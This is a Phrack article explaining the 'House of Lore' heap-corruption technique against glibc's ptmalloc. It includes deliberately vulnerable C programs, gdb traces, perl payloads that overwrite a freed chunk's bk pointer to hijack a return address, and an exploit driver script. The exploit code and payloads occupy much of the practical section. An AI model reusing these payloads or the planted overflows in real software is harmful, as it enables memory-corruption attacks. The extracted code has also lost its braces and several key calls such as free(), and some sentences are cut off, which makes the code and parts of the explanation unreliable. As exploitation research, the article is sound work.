[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]

..[ Phrack Magazine ]..
.:: The House Of Lore: Reloaded ptmalloc v2 & v3: Analysis & Corruption ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ] [ 69 ] [ 70 ]
Current issue : #67 | Release date : 2010-11-17 | Editor : The Phrack Staff
IntroductionThe Phrack Staff
Phrack Prophile on PunkThe Phrack Staff
Phrack World NewsEL ZILCHO
Loopback (is back)The Phrack Staff
How to make it in PrisonTAp
Kernel instrumentation using kprobesElfMaster
ProFTPD with mod_sql pre-authentication, remote rootFelineMenace
The House Of Lore: Reloaded ptmalloc v2 & v3: Analysis & Corruptionblackngel
A Eulogy for Format StringsCaptain Planet
Dynamic Program Analysis and Software ExploitationBSDaemon
Exploiting Memory Corruptions in Fortran Programs Under Unix/VMSMagma
Phrackerz: Two TalesAntipeace & The Analog Kid
Scraps of notes on remote stack overflow exploitationpi3
Notes Concerning The Security, Design and Administration of Siemens DCO-CSThe Philosopher
Hacking the mind for fun and profitlvxferis
International scenesvarious
Title : The House Of Lore: Reloaded ptmalloc v2 & v3: Analysis & Corruption
Author : blackngel
                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x43, Phile #0x08 of 0x10

|=-------------------=[ The House Of Lore: Reloaded ]=-------------------=|
|=-------------=[ ptmalloc v2 & v3: Analysis & Corruption ]=-------------=|
|=--------------------------=[  by blackngel  ]=-------------------------=|

              *`* @@ *`*     HACK THE WORLD
             *   *--*   *    
                  ##         <blackngel1@gmail.com>
                  ||         <black@set-ezine.org>
                 *  *
                *    *       (C) Copyleft 2010 everybody
               _*    *_


   1 - Preface

   2 - Introduction

     2.1 - KiddieDbg Ptmalloc2

     2.2 - SmallBin Corruption

         2.2.1 - Triggering The HoL(e)

         2.2.2 - A More Confusing Example

   3 - LargeBin Corruption Method

   4 - Analysis of Ptmalloc3

     4.1 - SmallBin Corruption (Reverse)

     4.2 - LargeBin Method (TreeBin Corruption)

     4.3 - Implement Security Checks

         4.3.1 - Secure Heap Allocator (Utopian)

         4.3.2 - dnmalloc

         4.3.3 - OpenBSD malloc

   5 - Miscellany, ASLR and More

   6 - Conclusions

   7 - Acknowledgments

   8 - References

   9 - Wargame Code


---[ 1 ---[   Preface   ]---

No offense, I could say that sometimes the world of hackers (at least) is 
divided into two camps: 
    1.- The illustrious characters who spend many hours to find holes in
    the current software.
    2.- And the hackers who spend most of their time to find a way to
    exploit a vulnerable code/environment that does not exist yet.

Maybe, it is a bit confusing but this is like the early question: which 
came first, the chicken or the egg? Or better... Which came first, the bug 
or the exploit?

Unlike what happens with an ordinary Heap Overflow, where we could say it's
the logical progression over time of a Stack Overflow, with The House of 
Lore technique seems to happen something special and strange, we know it's 
there (a thorn in your mind), that something happens, something is wrong 
and that we can exploit it.

But we do not know how to do it. And that is all over this stuff, we know
the technique (at least the Phantasmal Phantasmagoria explanation), but
perhaps has anyone seen a sample vulnerable code that can be exploited?

Maybe someone is thinking: well, if the bug exists and it is an ordinary 
Heap Overflow... 

     1.- What are the conditions to create a new technique? 
     2.- Why a special sequence of calls to malloc( ) and free( ) allows a 
     specific exploit technique and why another sequence needs other 
     3.- What are the names of those sequences? Are the sequences a bug or 
     is it pure luck?

This can give much food for thought. If Phantasmal had left a clear 
evidence of his theory, surely we would have forgotten about it, but as 
this did not happened, some of us are spending all day analyzing the way to 
create a code that can be committed with a technique that a virtual expert 
gave us in 2005 in a magnificent article that everyone already knows, 

We speak about "Malloc Maleficarum" [1], great theory that I myself had the 
opportunity to demonstrate in practice in the "Malloc Des-Maleficarum" [2] 
article. But unfortunately I left a job unresolved yet. In the pas I was 
not able to interpret so correct one of the techniques that were presented 
by Phantasmal, we speak of course of "The House of Lore" technique, but in
a moment of creativity it seems that I finally found a solution.

Here I submit the details of how a vulnerable code can be attacked with The
House of Lore (THoL from now), thus completing a stage that for some reason
was left unfinished.

In addition, we will target not only the smallbin corruption method which
many have heard of, but we also introduce the complications in largebin 
method and how to solve them. I also present two variants based on these 
techniques that I have found to corrupt the Ptmalloc3 structure.

There are also more content in this paper like a small program where to 
apply one of the techniques can be exploited, it is very useful for an 

And... yes, THoL was exactly the thorn that I had into my mind.

               << One can resist the invasion
                  of an army but one cannot
                  resist the invasion of ideas. >>

                                   [ Victor Hugo ]

---[ 2 ---[   Introduction   ]---

Then, before starting with practical examples, we reintroduce the technical
background of the THoL. While that one might take the Phantasmal's theory
as the only support for subsequent descriptions, we will offer a bigger and
more deep approach to the subject and also some small indications on how 
you can get some information from Ptmalloc2 in runtime without having to 
modify or recompile your personal GlibC.

We mention that dynamic hooks could be a better way to this goal. More
control, more conspicuous.

               << Great spirits have always encountered
                  violent opposition from mediocre minds. >>

                                         [ Albert Einstein ]

---[ 2.1 ---[   KiddieDbg Ptmalloc2   ]---

In an effort to make things easier to the reader when we will perform all
subsequent tests, let's indicate the simple way you can use PTMALLOC2 to
obtain the necessary information from within each attack.

To avoid the tedious task of recompiling GLIBC when one makes a minor 
change in "malloc.c", we decided to directly download the sources of 
ptmalloc2 from: http://www.malloc.de/malloc/ptmalloc2-current.tar.gz.

Then we compiled it in a Kubuntu 9.10 Linux distribution (it will not be a 
great effort to type a make) and you can directly link it as a static 
library to each of our examples like this:

   gcc prog.c libmalloc.a -o prog

However, before compiling this library, we allowed ourselves the luxury of 
introducing a pair of debugging sentences. To achieve this we made use of a
function that is not accessible to everybody, one has to be very eleet to 
know it and only those who have been able to escape to Matrix have the 
right to use it. This lethal weapon is known among the gurus as 
"printf( )".

And now, enough jokes, here are the small changes in "malloc.c" to get some 
information at runtime:

----- snip -----

_int_malloc(mstate av, size_t bytes)
  checked_request2size(bytes, nb);

  if ((unsigned long)(nb) <= (unsigned long)(av->max_fast)) {

  if (in_smallbin_range(nb)) {
    idx = smallbin_index(nb);
    bin = bin_at(av,idx);
    if ( (victim = last(bin)) != bin) {

printf("\n[PTMALLOC2] -> (Smallbin code reached)");
printf("\n[PTMALLOC2] -> (victim = [ %p ])", victim);

      if (victim == 0) /* initialization check */
      else {
        bck = victim->bk;

printf("\n[PTMALLOC2] -> (victim->bk = [ %p ])\n", bck);

        set_inuse_bit_at_offset(victim, nb);
        bin->bk = bck;
        bck->fd = bin;

        if (av != &main_arena)
	  victim->size |= NON_MAIN_ARENA;
        check_malloced_chunk(av, victim, nb);
        return chunk2mem(victim);

----- snip -----

Here we can know when a chunk is extracted from its corresponding bin to
satisfy a memory request of appropriate size. In addition, we can control
the pointer value that takes the "bk" pointer of a chunk if it has been
previously altered.

----- snip -----

    victim = av->top;
    size = chunksize(victim);

    if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {
printf("\n[PTMALLOC2] -> (Chunk from TOP)");
      return chunk2mem(victim);

----- snip -----

Here you simply provide a warning to be aware of when a memory request is
served from the Wilderness chunk (av->top).

----- snip -----

        bck = unsorted_chunks(av);
        fwd = bck->fd;
        p->bk = bck;
        p->fd = fwd;
        bck->fd = p;
        fwd->bk = p;
printf("\n[PTMALLOC2] -> (Freed and unsorted chunk [ %p ])", p);

----- snip -----

Unlike the first two changes which were introduced in the "_int_malloc( )"
function, the latter did it in "_int_free( )" and clearly indicates when a 
chunk has been freed and introduced into the unsorted bin for a further use
of it.

               << I have never met a man so
                  ignorant that I couldn't
                  learn something from him. >>

                           [ Galileo Galilei ]

---[ 2.2 ---[   SmallBin Corruption   ]---

Take again before starting the piece of code that will trigger the 
vulnerability described in this paper:

----- snip ----- 

  if (in_smallbin_range(nb)) {
    idx = smallbin_index(nb);
    bin = bin_at(av,idx);
    if ( (victim = last(bin)) != bin) {

      if (victim == 0) /* initialization check */
      else {
        bck = victim->bk;
        set_inuse_bit_at_offset(victim, nb);
        bin->bk = bck;
        bck->fd = bin;

        if (av != &main_arena)
	  victim->size |= NON_MAIN_ARENA;
        check_malloced_chunk(av, victim, nb);
        return chunk2mem(victim);

----- snip ----- 

To reach this area of the code inside "_int_malloc( )", one assumes the 
fact that the size of memory request is largest that the current value of 
"av->max_fast" in order to pass the first check and avoid fastbin[ ] 
utilization. Remember that this value is "72" by default.

This done, then comes the function "in_smallbin_range(nb)" which checks in 
turn if the chunk of memory requested is less than that MIN_LARGE_SIZE, 
defined to 512 bytes in malloc.c.

We know from the documentation that: "the size bins for less than 512 bytes
contain always the same size chunks". With this we know that if a chunk of
a certain size has been introduced in its corresponding bin, a further
request of the same size will find the appropriate bin and will return the
previously stored chunk. The functions "smallbin_index(nb)" and 
"bin_at(av, idx)" are responsible for finding the appropriate bin for the
chunk requested.

We also know that a "bin" is a couple of pointers "fd" and "bk", the 
purpose of the pointers is to close the doubly linked list of the free 
chunks. The macro "last(bin)" returns the pointer "bk" of this "fake 
chunk", it also indicates the last available chunk in the bin (if any). If 
none exists, the pointer "bin->bk" would be pointing to itself, then it 
will fail the search and it would be out of the smallbin code.

If there is an available chunk of adequate size, the process is simple. 
Before being returned to the caller, it must be unlinked from the list and,
in order to do it, malloc uses the following instructions:

   1) bck = victim->bk; // bck points to the penultimate chunk

   2) bin->bk = bck;    // bck becomes the last chunk

   3) bck->fd = bin;    // fd pointer of the new last chunk points
                           to the bin to close the list again

If all is correct, the user is given the pointer *mem of victim by the 
macro "chunk2mem(victim)."

The only extra tasks in this process are to set the PREV_INUSE bit of the
contiguous chunk, and also to manage the NON_MAIN_ARENA bit if victim is 
not in the main arena by default.

And here is where the game starts.

The only value that someone can control in this whole process is obviously 
the value of "victim->bk". But to accomplish this, a necessary condition 
must be satisfied:

   1 - That two chunks have been allocated previously, that the latter has
       been freed and that the first will be vulnerable to an overflow.

If this is true, the overflow of the first chunk will allow to manipulate
the header of the already freed second chunk, specifically the "bk" pointer
because other fields are not interesting at this time. Always remember that
the overflow must always occur after the release of this second piece, and
I insist on it because we do not want to blow the alarms within 
"_int_free()" before its time.

As mentioned, if this manipulated second piece is introduced in its 
corresponding bin and a new request of the same size is performed, the 
smallbin code is triggered, and therefore come to the code that interests 

"bck" is pointing to the altered "bk" pointer of victim and as a result, 
will become the last piece in "bin->bk = bck". Then a subsequent call to 
malloc( ) with the same size could deliver a chunk in the position of 
memory with which we had altered the "bk" pointer, and if this were in the 
stack we already know what happens.

In this attack one must be careful with the sentence "bck->fd = bin" since 
this code tries to write to the pointer "fd" the bin's address to close the
linked list, this memory area must have writing permissions.

The only last thing really important for the success of our attack:

When a chunk is freed, it is inserted into the known "unsorted bin". This
is a special bin, also a doubly linked list, with the peculiarity that the
chunks are not sorted (obviously) according to the size. This bin is like a
stack, the chunks are placed in this bin when they are freed and the chunks 
will always been inserted in the first position.

This is done with the intention that a subsequent call to "malloc( ),
calloc( ) or realloc( )" can make use of this chunk if its size can fulfill
the request. This is done to improve efficiency in the memory allocation 
process as each chunk introduced in the unsorted bin has a chance to be 
reused immediately without going through the sorting algorithm.

How does this process work?

All begins within "_int_malloc( )" with the next loop:

   while ( (victim = unsorted_chunks(av)->bk) != unsorted_chunks(av))

then takes the second last piece of the list:

   bck = victim->bk

checks if the memory request is within "in_smallbin_range( )", and it is
checked whether the request could be met with victim. Otherwise, proceed to
remove victim from unsorted bin with:

  unsorted_chunks(av)->bk = bck;
  bck->fd = unsorted_chunks(av);

which is the same as saying: the bin points to the penultimate chunk, and
the penultimate chunk points to the bin which becomes the latest chunk in
the list.

Once removed from the list, two things can happen. Either the size of the
removed chunk matches with the request made (size == nb) in which case it
returns the memory for this chunk to the user, or it does not coincide and 
that's when we proceed to introduce the chunk in the adequate bin with:

   bck = bin_at(av, victim_index);
   fwd = bck->fd;
   victim->bk = bck;
   victim->fd = fwd;
   fwd->bk = victim;
   bck->fd = victim;

Why do we mention this? Well, the condition that we mentioned requires that
the freed and manipulated chunk will be introduced in its appropriate bin, 
since as Phantasmal said, altering an unsorted chunk is not interesting at
this time.

With this in mind, our vulnerable program should call malloc( ) between the
vulnerable copy function and the subsequent call to malloc( ) requesting 
the same size as the chunk recently freed. In addition, this intermediate 
call to malloc( ) should request a size larger than the released one, so 
that the request can not be served from unsorted list of chunks and 
proceeds to order the pieces into their respective bins.

We note before completing this section that a bin of a real-life 
application might contain several chunks of the same size stored and 
waiting to be used. When a chunk comes from unsorted bin, that is inserted 
into its appropriate bin as the first in the list, and according to our 
theory, our altered chunk is not being used until it occupies the last 
position (last(bin)). If this occurs, multiple calls to malloc( ) with the 
same size must be triggered so that our chunk reaches the desired position 
in the circular list. At that point, the "bk" pointer must be hacked.

Graphically would pass through these stages:

Stage 1: Insert victim into smallbin[ ].

                   bin->bk  ___  bin->fwd
                  !         ^ ^           !
               [last]-------| |-------[victim]
                 ^|   l->fwd    v->bk    ^|
                 |!                      |!
               [....]                  [....]
                   \\                  //
                    [....]        [....]
                     ^ |____________^ |

Stage 2: "n" calls to malloc( ) with same size.

                   bin->bk  ___  bin->fwd
                  !         ^ ^           !
              [victim]------| |--------[first]
                 ^|   v->fwd    f->bk    ^|
                 |!                      |!
               [....]                  [....]
                   \\                  //
                    [....]        [....]
                     ^ |____________^ |

Stage 3: Overwrite "bk" pointer of victim.

                   bin->bk  ___  bin->fwd
 & stack          !         ^ ^           !
     ^--------[victim]------| |--------[first]
        v->bk     ^   v->fwd    f->bk    ^|
                  |                      |!
               [....]                  [....]
                   \\                  //
                    [....]        [....]
                     ^ |____________^ |

Stage 4: Last call to malloc( ) with same size.

                   bin->bk  ___  bin->fwd
 & -w- perm       !         ^ ^           !
     ^--------[&stack]------| |--------[first]
        v->bk     ^   v->fwd    f->bk    ^|
                  |                      |!
               [....]                  [....]
                   \\                  //
                    [....]        [....]
                     ^ |____________^ |

It is where the pointer "*mem" is returned pointing to the stack and thus 
giving full control of the attacked system. However as there are people who
need to see to believe, read on next section.

Note: I have not checked all versions of glibc, and some changes have been
made since I wrote this paper. For example, on an Ubuntu box (with glibc
2.11.1) we see the next fix:

----- snip -----

        bck = victim->bk;
        if (__builtin_expect (bck->fd != victim, 0))
            errstr = "malloc(): smallbin double linked list corrupted";
            goto errout;
        set_inuse_bit_at_offset(victim, nb);
        bin->bk = bck;
        bck->fd = bin;

----- snip -----

This check can still be overcome if you control an area into the stack and
you can write an integer such that its value is equal to the address of the
recently free chunk (victim). This must happen before the next call to
malloc( ) with the same size requested.

               << The grand aim of all science is to cover
                  the greatest number of empirical facts
                  by logical deduction from the smallest
                  number of hypotheses or axioms. >>

                                       [ Albert Einstein ]

---[ 2.2.1 ---[   Triggering The HoL(e)   ]---

After the theory... A practical example to apply this technique, here is a 
detailed description:

---[ thl.c ]---

#include <stdio.h>
#include <string.h>

void evil_func(void)
    printf("\nThis is an evil function. You become a cool \
hacker if you are able to execute it.\n"); 

void func1(void)
    char *lb1, *lb2;
    lb1 = (char *) malloc(128);
    printf("LB1 -> [ %p ]", lb1);
    lb2 = (char *) malloc(128);
    printf("\nLB2 -> [ %p ]", lb2);

    strcpy(lb1, "Which is your favourite hobby? ");
    printf("\n%s", lb1);
    fgets(lb2, 128, stdin);

int main(int argc, char *argv[])
    char *buff1, *buff2, *buff3;

    buff1 = (char *) malloc(16);
    printf("\nBuff1 -> [ %p ]", buff1);
    buff2 = (char *) malloc(128);
    printf("\nBuff2 -> [ %p ]", buff2);
    buff3 = (char *) malloc(256);
    printf("\nBuff3 -> [ %p ]\n", buff3);


    printf("\nBuff4 -> [ %p ]\n", malloc(1423));

    strcpy(buff1, argv[1]);


    return 0;

---[ end thl.c ]---

The program is very simple, we have a buffer overflow in "buff1" and an
"evil_func( )" function which is never called but which we want to run.

In short we have everything we need in order to trigger THoL:

1) Make a first call to malloc(4056), it shouldn't be necessary but we use 
   to warm up the system. Furthermore, in a real-life application the heap 
   probably won't be starting from scratch.

2) We allocate three chunks of memory, 16, 128 and 256 bytes respectively,
   since no chunks has been released before, we know that they must been 
   taken from the Wilderness or Top Chunk.

3) Free() the second chunk of 128 bytes. This is placed in the unsorted 

4) Allocate a fourth piece larger than the most recently freed chunk. The
   "buff2" is now extracted from the unsorted list and added to its 
   appropriate bin.

5) We have a vulnerable function strcpy( ) that can overwrite the header
   of the chunk previously passed to free( ) (including its "bk" field).

6) We call func1( ) which allocated two blocks of 128 bytes (the same size
   as the piece previously released) to formulate a question and get a user

It seems that in point 6 there is nothing vulnerable, but everyone knows
that if "LB2" point to the stack, then we may overwrite a saved return
address. That is our goal, and we will see this approach.

A basic execution could be like this:

black@odisea:~/ptmalloc2$ ./thl AAAA

[PTMALLOC2] -> (Chunk from TOP)
Buff1 -> [ 0x804ffe8 ]
[PTMALLOC2] -> (Chunk from TOP)
Buff2 -> [ 0x8050000 ]
[PTMALLOC2] -> (Chunk from TOP)
Buff3 -> [ 0x8050088 ]

[PTMALLOC2] -> (Freed and unsorted chunk [ 0x804fff8 ])
[PTMALLOC2] -> (Chunk from TOP)
Buff4 -> [ 0x8050190 ]

[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0x804fff8 ])
[PTMALLOC2] -> (victim->bk = [ 0x804e188 ])
LB1 -> [ 0x8050000 ]
[PTMALLOC2] -> (Chunk from TOP)
LB2 -> [ 0x8050728 ]
Which is your favourite hobby: hack

We can see that the first 3 malloced chunks are taken from the TOP, then 
the second chunk (0x0804fff8) is passed to free() and placed in the 
unsorted bin. This piece will remain here until the next call to malloc( ) 
will indicate whether it can meet the demand or not.

Since the allocated fourth buffer is larger than the recently freed, it's 
taken again from TOP, and buff2 is extracted from unsorted bin to insert it
into the bin corresponding to its size (128).

After we see how the next call to malloc(128) (lb1) triggers smallbin code 
returning the same address that the buffer previously freed. You can see 
the value of "victim->bk" which is what should take (lb2) after this 
address had been passed to the chunk2mem( ) macro.

However, we can see in the output: the lb2 is taken from the TOP and not
from a smallbin. Why? Simple, we've just released a chunk (only had a piece
in the corresponding bin to the size of this piece) and since we have not 
altered the "bk" pointer of the piece released, the next check:

   if ( (victim = last(bin)) != bin)

which is the same as:

   if ( (victim = (bin->bk = oldvictim->bk)) != bin)

will say that the last piece in the bin points to the bin itself, and
therefore, the allocation must be extracted from another place.

Until here all right, then, what do we need to exploit the program?

1) Overwrite buff2->bk with an address on the stack near a saved return 
   address (inside the frame created by func1( )).

2) This address, in turn, must fall on a site such that the "bk" pointer of
   this fake chunk will be an address with write permissions.

3) The evil_func()'s address with which we want to overwrite EIP and the 
   necessary padding to achieve the return address.

Let's start with the basics:

If we set a breakpoint in func1( ) and examine memory, we get:

(gdb) x/16x $ebp-32
0xbffff338:     0x00000000      0x00000000      0xbffff388      0x00743fc0
0xbffff348:     0x00251340      0x00182a20      0x00000000      0x00000000
0xbffff358:     0xbffff388      0x08048d1e      0x0804ffe8      0xbffff5d7
0xbffff368:     0x0804c0b0      0xbffff388      0x0013f345      0x08050088

EBP -> 0xbffff358
RET -> 0xbffff35C

But the important thing here is that we must alter buff2->bk with the
"0xbffff33c" value so the new victim->bk take a writable address.

Items 1 and 2 passed. The evil_func()'s address is:

(gdb) disass evil_func
Dump of assembler code for function evil_func:
0x08048ba4 <evil_func+0>:       push   %ebp  

And now, without further delay, let's see what happens when we merge all
these elements into a single attack:

black@odisea:~/ptmalloc2$ perl -e 'print "BBBBBBBB". "\xa4\x8b\x04\x08"' >


(gdb) run `perl -e 'print "A"x28 . "\x3c\xf3\xff\xbf"'` < evil.in                                                                            

[PTMALLOC2] -> (Chunk from TOP)
Buff1 -> [ 0x804ffe8 ] 
[PTMALLOC2] -> (Chunk from TOP)
Buff2 -> [ 0x8050000 ] 
[PTMALLOC2] -> (Chunk from TOP)
Buff3 -> [ 0x8050088 ]         

[PTMALLOC2] -> (Freed and unsorted chunk [ 0x804fff8 ])
[PTMALLOC2] -> (Chunk from TOP)                                                
Buff4 -> [ 0x8050190 ]

[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0x804fff8 ])
[PTMALLOC2] -> (victim->bk = [ 0xbffff33c ]) // First stage of attack
LB1 -> [ 0x8050000 ]
[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0xbffff33c ])     // Victim in the stack
[PTMALLOC2] -> (victim->bk = [ 0xbffff378 ]) // Address with write perms

LB2 -> [ 0xbffff344 ]                        // Boom!
Which is your favourite hobby?

This is an evil function. You become a cool hacker if you are able to
execute it.                                  // We get a cool msg.

Program received signal SIGSEGV, Segmentation fault.
0x08048bb7 in evil_func ()

You must be starting to understand now what I wanted to explain in the 
preface of this article, instead of discovering or inventing a new 
technique, what we have been doing for a long time is to find the way to 
design a vulnerable application to this technique which had fallen us from 
the sky a few years ago.

Compile this example with normal GLIBC and you will get the same result, 
only remember adjusting evil_func( ) address or the area where you have
stored your custom arbitrary code.

               << The unexamined life is not worth living. >>

                                                 [ Socrates ]

---[ 2.2.2 ---[   A More Confusing Example   ]---

To understand how THoL could be applied in a real-life application, I 
present below a source code created by me as if it were a game, that will
offer a broader view of the attack.

This is a crude imitation of an agent manager. The only thing this program
can do is creating a new agent, editing it (ie edit their names and 
descriptions) or deleting it. To save space, one could edit only certain 
fields of an agent, leaving the other free without taking up memory or 
freeing when no longer needed.

In addition, to avoid unnecessary extensions in this paper, the entire
information entered into the program is not saved in any database and only
remains available while the application is in execution.

---[ agents.c ]---

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void main_menu(void);

void create_agent(void);
void select_agent(void);
void edit_agent(void);
void delete_agent(void);

void edit_name(void);
void edit_lastname(void);
void edit_desc(void);
void delete_name(void);
void delete_lastname(void);
void delete_desc(void);
void show_data_agent(void);

typedef struct agent {
   int id;
   char *name;
   char *lastname;
   char *desc;
} agent_t;

agent_t *agents[256];
int agent_count = 0;
int sel_ag = 0;

int main(int argc, char *argv[])

void main_menu(void)
   int op = 0;
   char opt[2];

   printf("\n\t\t\t\t[1] Create new agent");
   printf("\n\t\t\t\t[2] Select Agent");
   printf("\n\t\t\t\t[3] Show Data Agent");
   printf("\n\t\t\t\t[4] Edit agent");
   printf("\n\t\t\t\t[0] <- EXIT");
   printf("\n\t\t\t\tSelect your option:");
   fgets(opt, 3, stdin);

   op = atoi(opt);
   switch (op) {
	case 1:
	case 2:
	case 3:
	case 4:
	case 0:


void create_agent(void)
   agents[agent_count] = (agent_t *) malloc(sizeof(agent_t));
   sel_ag = agent_count;
   agents[agent_count]->id = agent_count;
   agents[agent_count]->name = NULL;
   agents[agent_count]->lastname = NULL;
   agents[agent_count]->desc = NULL;
   printf("\nAgent %d created, now you can edit it", sel_ag);
   agent_count += 1;

void select_agent(void)
   char ag_num[2];
   int num;
   printf("\nWrite agent number: ");
   fgets(ag_num, 3, stdin);
   num = atoi(ag_num);

   if ( num >= agent_count ) {
       printf("\nOnly %d available agents, select another", agent_count);
   } else {
       sel_ag = num;
       printf("\n[+] Agent %d selected.", sel_ag);

void show_data_agent(void)
   printf("\nAgent [%d]", agents[sel_ag]->id);

   printf("\nName: "); 
   if(agents[sel_ag]->name != NULL)
       printf("%s", agents[sel_ag]->name);

   printf("\nLastname: ");  
   if(agents[sel_ag]->lastname != NULL)
       printf("%s", agents[sel_ag]->lastname);
   printf("\nDescription: ");
   if(agents[sel_ag]->desc != NULL)
       printf("%s", agents[sel_ag]->desc);

void edit_agent(void)
   int op = 0;
   char opt[2];

   printf("\n\t\t\t\t[1] Edit name");
   printf("\n\t\t\t\t[2] Edit lastname");
   printf("\n\t\t\t\t[3] Edit description");
   printf("\n\t\t\t\t[4] Delete name");
   printf("\n\t\t\t\t[5] Delete lastname");
   printf("\n\t\t\t\t[6] Delete description");
   printf("\n\t\t\t\t[7] Delete agent");
   printf("\n\t\t\t\t[0] <- MAIN MENU");
   printf("\n\t\t\t\tSelect Agent Option: ");
   fgets(opt, 3, stdin);

   op = atoi(opt);

   switch (op) {
      case 1:
      case 2:
      case 3:
      case 4:
      case 5:
      case 6:
      case 7:
      case 0:

void edit_name(void)
   if(agents[sel_ag]->name == NULL) {
      agents[sel_ag]->name = (char *) malloc(32);
      printf("\n[!!!]malloc(ed) name [ %p ]", agents[sel_ag]->name);

   printf("\nWrite name for this agent: ");
   fgets(agents[sel_ag]->name, 322, stdin);

void delete_name(void)
   if(agents[sel_ag]->name != NULL) {
      agents[sel_ag]->name = NULL;

void edit_lastname(void)
   if(agents[sel_ag]->lastname == NULL) {
      agents[sel_ag]->lastname = (char *) malloc(128);
      printf("\n[!!!]malloc(ed) lastname [ %p ]",agents[sel_ag]->lastname);
   printf("\nWrite lastname for this agent: ");
   fgets(agents[sel_ag]->lastname, 127, stdin);

void delete_lastname(void)
   if(agents[sel_ag]->lastname != NULL) {
      agents[sel_ag]->lastname = NULL;

void edit_desc(void)
   if(agents[sel_ag]->desc == NULL) {
      agents[sel_ag]->desc = (char *) malloc(256);
      printf("\n[!!!]malloc(ed) desc [ %p ]", agents[sel_ag]->desc);

   printf("\nWrite description for this agent: ");
   fgets(agents[sel_ag]->desc, 255, stdin);

void delete_desc(void)
   if(agents[sel_ag]->desc != NULL) {
      agents[sel_ag]->desc = NULL;

void delete_agent(void)
    if (agents[sel_ag] != NULL) {
        agents[sel_ag] = NULL;
        printf("\n[+] Agent %d deleted\n", sel_ag);

        if (sel_ag == 0) {
            agent_count = 0;
	      printf("\n[!] Empty list, please create new agents\n");
        } else {
	      sel_ag -= 1;
            agent_count -= 1;
	      printf("[+] Current agent selection: %d\n", sel_ag);
    } else {
        printf("\n[!] No agents to delete\n"); 

---[ end agents.c ]---

This is the perfect program that I would present in a wargame to those who 
wish to apply the technique described in this paper.

Someone might think that maybe this program is vulnerable to other 
techniques described in the Malloc Des-Maleficarum. Indeed given the 
ability of the user to manage the memory space, it may seem that The House 
of Mind can be applied here, but one must see that the program limits us to
the creation of 256 structures of type "agent_t", and that the size of 
these structures is about 432 bytes (approximately when you allocate all 
its fields). If we multiply this number by 256 we get: (110592 = 0x1B000h) 
which seems too small to let us achieve the desirable address "0x08100000" 
necessary to corrupt the NON_MAIN_ARENA bit of an already allocated chunk 
above that address (and thus create a fake arena in order to trigger the 
attack aforementioned).

Another technique that one would take as viable would be The House of Force
since at first it is easy to corrupt the Wilderness (the Top Chunk), but
remember that in order to apply this method one of the requirements is that
the size of a call to malloc( ) must been defined by the designer with the
main goal of corrupting "av->top". This seems impossible here.

Other techniques are also unworkable for several reasons, each due to their
intrinsic requirements. So we must study how to sort the steps that trigger
the vulnerability and the attack process that we have studied so far.

Let's see in detail:

After a quick look, we found that the only vulnerable function is:

   void edit_name(void) {
         agents[sel_ag]->name = (char *) malloc(32);
      fgets(agents[sel_ag]->name, 322, stdin);

At first it seems a simple typographical error, but it allows us to 
override the memory chunk that we allocated after "agents[]->name", which
can be any, since the program allows practically a full control over 

To imitate the maximum possible vulnerable process shown in the previous
section, the most obvious thing we can do to start is to create a new agent
(0) and edit all fields. With this we get:

   malloc(sizeof(agent_t));  // new agent
   malloc(32);               // agents[0]->name
   malloc(128);              // agents[0]->lastname
   malloc(256);              // agents[0]->desc

The main target is to overwrite the "bk" pointer in the field 
"agents[]->lastname" if we have freed this chunk previously. Moreover, 
between these two actions, we need to allocate a chunk of memory to be
selected from the "TOP code", so that the chunks present in the unsorted 
bin are sorted in their corresponding bins for a later reuse.

For this, what we do is create a new agent(1), select the first agent(0) 
and delete its field "lastname", select the second agent(1) and edit its
description. This is equal to:

   malloc(sizeof(agent_t));      // Get a chunk from TOP code      
   free(agents[0]->lastname);    // Insert chunk at unsorted bin
   malloc(256);                  // Get a chunk from TOP code

After this last call to malloc( ), the freed chunk of 128 bytes (lastname)
will have been placed in its corresponding bin. Now we can alter "bk" 
pointer of this chunk, and for this we select again the first agent(0) and 
edit its name (here there will be no call to malloc( ) since it has been 
previously assigned).

At this time, we can place a proper memory address pointing to the stack 
and make two calls to malloc(128), first editing the "lastname" field of 
the second agent(1) and then editing the "lastname" field of agent(0) one
more time.

These latest actions should return a memory pointer located in the stack in
a position of your choice, and any written content on "agents[0]->lastname"
could corrupt a saved return address.

Without wishing to dwell too much more, we show here how a tiny-exploit 
alter the above pointer "bk" and returns a chunk of memory located in the

---[ exthl.pl ]---


print "1\n" .              # Create agents[0]
      "4\n" .              # Edit agents[0]
      "1\nblack\n" .       # Edit name agents[0]
      "2\nngel\n" .        # Edit lastname agents[0]
      "3\nsuperagent\n" .  # Edit description agents[0]
      "0\n1\n" .           # Create agents[1]
      "2\n0\n" .           # Select agents[0]
      "4\n5\n" .           # Delete lastname agents[0]
      "0\n2\n1\n" .        # Select agents[1]
      "4\n" .              # Edit agents[1]
      "3\nsupersuper\n" .  # Edit description agents[1]
      "0\n2\n0\n" .        # Select agents[0]
      "4\n" .              # Edit agents[0]
      "\x94\xee\xff\xbf" . # Edit name[0] and overwrite "lastname->bk"
      "\n0\n2\n1\n" .      # Select agents[1]
      "4\n" .              # Edit agents[1]
      "2\nother\n" .       # Edit lastname agents[1]
      "0\n2\n0\n" .        # Select agents[0]
